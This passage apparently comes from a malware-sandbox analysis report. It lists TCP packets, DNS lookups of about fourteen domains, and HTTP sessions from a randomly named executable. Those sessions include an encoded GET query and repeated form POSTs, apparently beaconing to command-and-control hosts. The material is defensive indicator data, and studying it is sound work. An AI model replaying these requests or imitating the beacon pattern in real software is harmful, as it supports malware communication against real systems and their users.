                                                    Jul 3, 2024 17:52:32.832165956 CEST8049751217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:32.832178116 CEST8049751217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:32.832338095 CEST4975180192.168.2.6217.160.0.84
                                                    Jul 3, 2024 17:52:32.832338095 CEST4975180192.168.2.6217.160.0.84
                                                    Jul 3, 2024 17:52:32.832429886 CEST8049751217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:32.832442999 CEST8049751217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:32.832453966 CEST8049751217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:32.832465887 CEST8049751217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:32.832484007 CEST4975180192.168.2.6217.160.0.84
                                                    Jul 3, 2024 17:52:32.832612991 CEST4975180192.168.2.6217.160.0.84
                                                    Jul 3, 2024 17:52:32.832649946 CEST8049751217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:32.832665920 CEST8049751217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:32.832679033 CEST8049751217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:32.832701921 CEST4975180192.168.2.6217.160.0.84
                                                    Jul 3, 2024 17:52:32.832742929 CEST4975180192.168.2.6217.160.0.84
                                                    Jul 3, 2024 17:52:32.833139896 CEST8049751217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:32.833220005 CEST4975180192.168.2.6217.160.0.84
                                                    Jul 3, 2024 17:52:32.837706089 CEST8049751217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:32.840327024 CEST4975180192.168.2.6217.160.0.84
                                                    Jul 3, 2024 17:52:32.842422962 CEST8049751217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:32.842433929 CEST8049751217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:32.842504978 CEST4975180192.168.2.6217.160.0.84
                                                    Jul 3, 2024 17:52:32.842504978 CEST4975180192.168.2.6217.160.0.84
                                                    Jul 3, 2024 17:52:33.404371023 CEST4975280192.168.2.6217.160.0.84
                                                    Jul 3, 2024 17:52:33.409312963 CEST8049752217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:53:27.543306112 CEST804976845.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:27.543318033 CEST804976845.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:27.543355942 CEST4976880192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:27.547791004 CEST804976845.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:27.547802925 CEST804976845.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:27.547846079 CEST4976880192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:27.588800907 CEST4976880192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:28.607350111 CEST4976980192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:28.612351894 CEST804976945.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:28.612601995 CEST4976980192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:28.614392996 CEST4976980192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:28.621515989 CEST804976945.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:28.621879101 CEST804976945.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:30.119978905 CEST4976980192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:30.143215895 CEST804976945.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:30.143230915 CEST804976945.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:30.143241882 CEST804976945.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:30.143280029 CEST4976980192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:30.143330097 CEST4976980192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:30.143951893 CEST804976945.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:30.143964052 CEST804976945.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:30.143974066 CEST804976945.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:30.143990040 CEST804976945.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:30.144001007 CEST4976980192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:30.144032001 CEST4976980192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:30.144932032 CEST804976945.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:30.144943953 CEST804976945.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:30.144954920 CEST804976945.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:30.144977093 CEST4976980192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:30.144977093 CEST4976980192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:30.145005941 CEST4976980192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:30.145442009 CEST804976945.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:30.145484924 CEST4976980192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:31.140969992 CEST4977080192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:31.145780087 CEST804977045.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:31.146028042 CEST4977080192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:31.148272038 CEST4977080192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:31.153199911 CEST804977045.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:32.511399031 CEST804977045.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:32.562216043 CEST4977080192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:38.376669884 CEST804977045.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:38.378485918 CEST4977080192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:38.380100965 CEST804977045.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:38.380115032 CEST804977045.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:38.380182981 CEST4977080192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:38.380182981 CEST4977080192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:38.409202099 CEST4977080192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:38.414244890 CEST804977045.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:43.457398891 CEST4977280192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:43.462332964 CEST8049772172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:43.462426901 CEST4977280192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:43.464940071 CEST4977280192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:43.470056057 CEST8049772172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:44.098350048 CEST8049772172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:44.098366022 CEST8049772172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:44.098436117 CEST4977280192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:44.098823071 CEST8049772172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:44.098891973 CEST4977280192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:44.981322050 CEST4977280192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:45.998362064 CEST4977380192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:46.003703117 CEST8049773172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:46.003793001 CEST4977380192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:46.005815029 CEST4977380192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:46.010947943 CEST8049773172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:46.653047085 CEST8049773172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:46.653089046 CEST8049773172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:46.653234959 CEST4977380192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:46.653738022 CEST8049773172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:46.654280901 CEST4977380192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:47.510679007 CEST4977380192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:48.529865980 CEST4977480192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:48.534789085 CEST8049774172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:48.535082102 CEST4977480192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:48.538191080 CEST4977480192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:48.543234110 CEST8049774172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:48.543737888 CEST8049774172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:49.176048994 CEST8049774172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:49.176536083 CEST8049774172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:49.176548958 CEST8049774172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:49.176659107 CEST4977480192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:50.042068958 CEST4977480192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:51.060606003 CEST4977580192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:51.066368103 CEST8049775172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:51.070313931 CEST4977580192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:51.072808027 CEST4977580192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:51.078250885 CEST8049775172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:51.731034040 CEST8049775172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:51.731097937 CEST8049775172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:51.731230021 CEST4977580192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:51.731528044 CEST8049775172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:51.731576920 CEST4977580192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:51.735790968 CEST4977580192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:51.740760088 CEST8049775172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:54:05.580352068 CEST4977680192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:05.591922998 CEST804977664.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:05.591989994 CEST4977680192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:05.594270945 CEST4977680192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:05.604835033 CEST804977664.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:06.244419098 CEST804977664.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:06.244780064 CEST804977664.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:06.244872093 CEST4977680192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:07.106178999 CEST4977680192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:08.129138947 CEST4977780192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:08.134011030 CEST804977764.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:08.134087086 CEST4977780192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:08.153166056 CEST4977780192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:08.158044100 CEST804977764.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:08.772382975 CEST804977764.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:08.772515059 CEST804977764.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:08.772624016 CEST4977780192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:09.666788101 CEST4977780192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:10.684755087 CEST4977880192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:10.689718008 CEST804977864.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:10.694257975 CEST4977880192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:10.698177099 CEST4977880192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:10.703880072 CEST804977864.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:10.703896046 CEST804977864.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:11.343502998 CEST804977864.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:11.343997955 CEST804977864.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:11.344064951 CEST4977880192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:12.197985888 CEST4977880192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:14.451227903 CEST4977980192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:14.457258940 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:14.457396030 CEST4977980192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:14.460971117 CEST4977980192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:14.467137098 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.122764111 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.122782946 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.122796059 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.122864962 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.122875929 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.122888088 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.122899055 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.122910023 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.122946024 CEST4977980192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:15.122987986 CEST4977980192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:15.122987986 CEST4977980192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:15.123114109 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.123126030 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.123157978 CEST4977980192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:15.128501892 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.128537893 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.134164095 CEST4977980192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:15.219712019 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.219741106 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.220211029 CEST4977980192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:15.220215082 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.220226049 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.220237017 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.220246077 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.220257044 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.220263958 CEST4977980192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:15.220333099 CEST4977980192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:15.220931053 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.220942020 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.220952034 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.221004009 CEST4977980192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:15.221004009 CEST4977980192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:15.223943949 CEST4977980192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:15.228784084 CEST804977964.190.62.22192.168.2.6
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jul 3, 2024 17:51:02.521353006 CEST5911453192.168.2.61.1.1.1
                                                    Jul 3, 2024 17:51:02.590318918 CEST53591141.1.1.1192.168.2.6
                                                    Jul 3, 2024 17:51:18.358464003 CEST6551753192.168.2.61.1.1.1
                                                    Jul 3, 2024 17:51:18.612556934 CEST53655171.1.1.1192.168.2.6
                                                    Jul 3, 2024 17:51:32.420876980 CEST5133753192.168.2.61.1.1.1
                                                    Jul 3, 2024 17:51:32.444983006 CEST53513371.1.1.1192.168.2.6
                                                    Jul 3, 2024 17:51:46.076648951 CEST6158553192.168.2.61.1.1.1
                                                    Jul 3, 2024 17:51:46.548752069 CEST53615851.1.1.1192.168.2.6
                                                    Jul 3, 2024 17:51:59.936331987 CEST6260953192.168.2.61.1.1.1
                                                    Jul 3, 2024 17:52:00.558340073 CEST53626091.1.1.1192.168.2.6
                                                    Jul 3, 2024 17:52:14.389023066 CEST5547153192.168.2.61.1.1.1
                                                    Jul 3, 2024 17:52:14.501841068 CEST53554711.1.1.1192.168.2.6
                                                    Jul 3, 2024 17:52:28.030612946 CEST4997153192.168.2.61.1.1.1
                                                    Jul 3, 2024 17:52:28.334990978 CEST53499711.1.1.1192.168.2.6
                                                    Jul 3, 2024 17:52:41.858103037 CEST5172853192.168.2.61.1.1.1
                                                    Jul 3, 2024 17:52:41.934259892 CEST53517281.1.1.1192.168.2.6
                                                    Jul 3, 2024 17:52:55.390187025 CEST6474253192.168.2.61.1.1.1
                                                    Jul 3, 2024 17:52:55.871165037 CEST53647421.1.1.1192.168.2.6
                                                    Jul 3, 2024 17:53:09.094197035 CEST5140253192.168.2.61.1.1.1
                                                    Jul 3, 2024 17:53:09.665852070 CEST53514021.1.1.1192.168.2.6
                                                    Jul 3, 2024 17:53:23.172265053 CEST6269553192.168.2.61.1.1.1
                                                    Jul 3, 2024 17:53:23.537981987 CEST53626951.1.1.1192.168.2.6
                                                    Jul 3, 2024 17:53:43.437366962 CEST5500553192.168.2.61.1.1.1
                                                    Jul 3, 2024 17:53:43.454359055 CEST53550051.1.1.1192.168.2.6
                                                    Jul 3, 2024 17:53:56.748897076 CEST5256453192.168.2.61.1.1.1
                                                    Jul 3, 2024 17:53:57.084956884 CEST53525641.1.1.1192.168.2.6
                                                    Jul 3, 2024 17:54:05.158168077 CEST5938553192.168.2.61.1.1.1
                                                    Jul 3, 2024 17:54:05.577315092 CEST53593851.1.1.1192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 3, 2024 17:51:02.521353006 CEST | 192.168.2.6 | 1.1.1.1 | 0x7f04 | Standard query (0) | www.fondazionegtech.org | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:51:18.358464003 CEST | 192.168.2.6 | 1.1.1.1 | 0xd61e | Standard query (0) | www.mengistiebethlehem.com | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:51:32.420876980 CEST | 192.168.2.6 | 1.1.1.1 | 0xf0eb | Standard query (0) | www.ad14.fun | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:51:46.076648951 CEST | 192.168.2.6 | 1.1.1.1 | 0x92ca | Standard query (0) | www.epicbazaarhub.com | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:51:59.936331987 CEST | 192.168.2.6 | 1.1.1.1 | 0x7f18 | Standard query (0) | www.rz6grmvv.shop | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:52:14.389023066 CEST | 192.168.2.6 | 1.1.1.1 | 0xa11 | Standard query (0) | www.hellokong.xyz | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:52:28.030612946 CEST | 192.168.2.6 | 1.1.1.1 | 0x4d7b | Standard query (0) | www.architect-usschool.com | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:52:41.858103037 CEST | 192.168.2.6 | 1.1.1.1 | 0x3ebe | Standard query (0) | www.easybackpage.net | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:52:55.390187025 CEST | 192.168.2.6 | 1.1.1.1 | 0xcf13 | Standard query (0) | www.superunicornpalace.com | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:53:09.094197035 CEST | 192.168.2.6 | 1.1.1.1 | 0xcca7 | Standard query (0) | www.tedjp-x.com | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:53:23.172265053 CEST | 192.168.2.6 | 1.1.1.1 | 0x6fcd | Standard query (0) | www.3cubesinterior.in | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:53:43.437366962 CEST | 192.168.2.6 | 1.1.1.1 | 0xc374 | Standard query (0) | www.artvectorcraft.store | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:53:56.748897076 CEST | 192.168.2.6 | 1.1.1.1 | 0xd71b | Standard query (0) | www.macklaer.com | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:54:05.158168077 CEST | 192.168.2.6 | 1.1.1.1 | 0xe535 | Standard query (0) | www.hondamechanic.today | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 3, 2024 17:51:02.590318918 CEST | 1.1.1.1 | 192.168.2.6 | 0x7f04 | No error (0) | www.fondazionegtech.org | sitestudio.it | | CNAME (Canonical name) | IN (0x0001) | false
Jul 3, 2024 17:51:02.590318918 CEST | 1.1.1.1 | 192.168.2.6 | 0x7f04 | No error (0) | sitestudio.it | | 89.31.76.10 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:51:18.612556934 CEST | 1.1.1.1 | 192.168.2.6 | 0xd61e | No error (0) | www.mengistiebethlehem.com | | 208.91.197.13 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:51:32.444983006 CEST | 1.1.1.1 | 192.168.2.6 | 0xf0eb | No error (0) | www.ad14.fun | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:51:32.444983006 CEST | 1.1.1.1 | 192.168.2.6 | 0xf0eb | No error (0) | www.ad14.fun | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:51:46.548752069 CEST | 1.1.1.1 | 192.168.2.6 | 0x92ca | No error (0) | www.epicbazaarhub.com | epicbazaarhub.com | | CNAME (Canonical name) | IN (0x0001) | false
Jul 3, 2024 17:51:46.548752069 CEST | 1.1.1.1 | 192.168.2.6 | 0x92ca | No error (0) | epicbazaarhub.com | | 192.185.208.8 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:52:00.558340073 CEST | 1.1.1.1 | 192.168.2.6 | 0x7f18 | No error (0) | www.rz6grmvv.shop | | 121.254.178.230 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:52:14.501841068 CEST | 1.1.1.1 | 192.168.2.6 | 0xa11 | No error (0) | www.hellokong.xyz | | 203.161.49.220 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:52:28.334990978 CEST | 1.1.1.1 | 192.168.2.6 | 0x4d7b | No error (0) | www.architect-usschool.com | | 217.160.0.84 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:52:41.934259892 CEST | 1.1.1.1 | 192.168.2.6 | 0x3ebe | No error (0) | www.easybackpage.net | parkingpage.namecheap.com | | CNAME (Canonical name) | IN (0x0001) | false
Jul 3, 2024 17:52:41.934259892 CEST | 1.1.1.1 | 192.168.2.6 | 0x3ebe | No error (0) | parkingpage.namecheap.com | | 91.195.240.19 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:52:55.871165037 CEST | 1.1.1.1 | 192.168.2.6 | 0xcf13 | No error (0) | www.superunicornpalace.com | superunicornpalace.com | | CNAME (Canonical name) | IN (0x0001) | false
Jul 3, 2024 17:52:55.871165037 CEST | 1.1.1.1 | 192.168.2.6 | 0xcf13 | No error (0) | superunicornpalace.com | | 144.208.124.10 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:53:09.665852070 CEST | 1.1.1.1 | 192.168.2.6 | 0xcca7 | No error (0) | www.tedjp-x.com | | 162.43.101.114 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:53:23.537981987 CEST | 1.1.1.1 | 192.168.2.6 | 0x6fcd | No error (0) | www.3cubesinterior.in | 3cubesinterior.in | | CNAME (Canonical name) | IN (0x0001) | false
Jul 3, 2024 17:53:23.537981987 CEST | 1.1.1.1 | 192.168.2.6 | 0x6fcd | No error (0) | 3cubesinterior.in | | 45.113.122.18 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:53:43.454359055 CEST | 1.1.1.1 | 192.168.2.6 | 0xc374 | No error (0) | www.artvectorcraft.store | ghs.google.com | | CNAME (Canonical name) | IN (0x0001) | false
Jul 3, 2024 17:53:43.454359055 CEST | 1.1.1.1 | 192.168.2.6 | 0xc374 | No error (0) | ghs.google.com | | 172.217.18.19 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:53:57.084956884 CEST | 1.1.1.1 | 192.168.2.6 | 0xd71b | Server failure (2) | www.macklaer.com | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:54:05.577315092 CEST | 1.1.1.1 | 192.168.2.6 | 0xe535 | No error (0) | www.hondamechanic.today | | 64.190.62.22 | A (IP address) | IN (0x0001) | false
                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    0 | 192.168.2.6 | 49724 | 89.31.76.10 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:51:02.603748083 CEST | 351 | OUT | GET /jmiz/?Bp=2LpD8tLh&7Dihs8p=FlIs+r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWKKTvYGFckMGyNztz9f5I1p/5DHHhHlE1nDIZgKO5qXvVh1+gwmyYcA+2CCaGrmZckpjuvJQ96WUy8TtzIG0Do= HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    Host: www.fondazionegtech.org
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:51:03.304894924 CEST | 1236 | IN | HTTP/1.1 301 Moved Permanently
                                                    Server: openresty
                                                    Date: Wed, 03 Jul 2024 15:51:03 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Length: 1078
                                                    Connection: close
                                                    Cache-Control: max-age=0, private, must-revalidate, max-age=0, must-revalidate, no-cache, no-store, private
                                                    Location: https://www.fondazionegtech.org/jmiz/?7Dihs8p=FlIs%20r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWKKTvYGFckMGyNztz9f5I1p%2F5DHHhHlE1nDIZgKO5qXvVh1%20gwmyYcA%202CCaGrmZckpjuvJQ96WUy8TtzIG0Do%3D&Bp=2LpD8tLh
                                                    Pragma: no-cache
                                                    Expires: Wed, 03 Jul 2024 15:51:03 GMT
                                                    X-XSS-Protection: 1; mode=block
                                                    X-Content-Type-Options: nosniff
                                                    Age: 0
                                                    X-Cache: MISS
                                                    X-BKSrc: 0.3


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    1 | 192.168.2.6 | 49726 | 208.91.197.13 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:51:18.622067928 CEST | 631 | OUT | POST /92z0/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 212
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.mengistiebethlehem.com
                                                    Origin: http://www.mengistiebethlehem.com
                                                    Referer: http://www.mengistiebethlehem.com/92z0/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    2 | 192.168.2.6 | 49728 | 208.91.197.13 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:51:21.161761045 CEST | 655 | OUT | POST /92z0/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 236
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.mengistiebethlehem.com
                                                    Origin: http://www.mengistiebethlehem.com
                                                    Referer: http://www.mengistiebethlehem.com/92z0/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
